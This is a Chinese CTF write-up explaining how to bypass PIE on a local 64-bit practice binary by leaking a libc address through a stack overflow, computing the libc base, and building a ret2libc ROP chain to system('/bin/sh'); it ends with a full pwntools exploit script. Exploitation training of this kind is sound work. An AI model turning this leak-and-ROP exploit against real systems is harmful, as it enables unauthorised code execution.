前置知识
PIE机制介绍
PIE PIE技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载基地址,从而不能通过ROPgadget等一些工具来帮助解题
vmmap 的使用
gdb 调试中,vmmap 可以直接看出本地的静态基地址,在栈上可以看到静态真实地址
上题(本地)
基础检查
发现是64位文件,开了pie保护和NX保护
丢入ida
很正常 没有什么漏洞
找一下系统函数
没有找到,判断应该是要泄露libc
但是因为开了pie 保护,加载基地址随机化,不能像ret2libc 一样用write函数,puts函数,printf函数等泄露出来
没有思路 用gdb 调试看看
发现了真实地址,那么我们可以泄露他的真实地址来算出他的基址
(真实地址=加载地址+偏移地址)
因为read 函数有字节限制,我们要泄露的地址只能是0x48以内的
有dl_mian和__libc_start_call_main 两个,我选择了第二个
算一下偏移
接下来我们要计算他的偏移地址(偏移地址=静态真实地址-静态加载地址)
他的静态真实地址为
静态基础地址可用vmmap 查看
可计算出偏移为0x276ca(本地和远程不一样)
使用payload1 的构造和libc_base 的计算为
payload=b'a'*40
io.recvuntil("please input your name: ")
io.send(payload)
addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(addr))
base=addr-0x276ca
print(hex(base))
这道题还要注意的是,它的ROP链也要用libc里的
由于是打本地
ldd 查看本地libc 路径
用ROPgadget找到ret和rdi 的偏移
同时把/bin/sh 也找出来
ret 和rdi,binsh的构造为
ret=0x275f2+base
rdi=0x27c65+base
binsh=0x19604f+base
最后进行一次栈溢出
payload=b'a'*40+p64(ret)+p64(rdi)+p64(binsh)+p64(base+libc.sym['system'])
运行得到shell
最终exp
from pwn import*
io=process('./vuln')
elf=ELF('./vuln')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
system=libc.symbols['__libc_start_main']
print(system)
payload=b'a'*40
io.recvuntil("please input your name: ")
io.send(payload)
addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(addr))
base=addr-0x276ca
print(hex(base))
ret=0x275f2+base
rdi=0x27c65+base
binsh=0x19604f+base
payload=b'a'*40+p64(ret)+p64(rdi)+p64(binsh)+p64(base+libc.sym['system'])
io.send(payload)
io.interactive()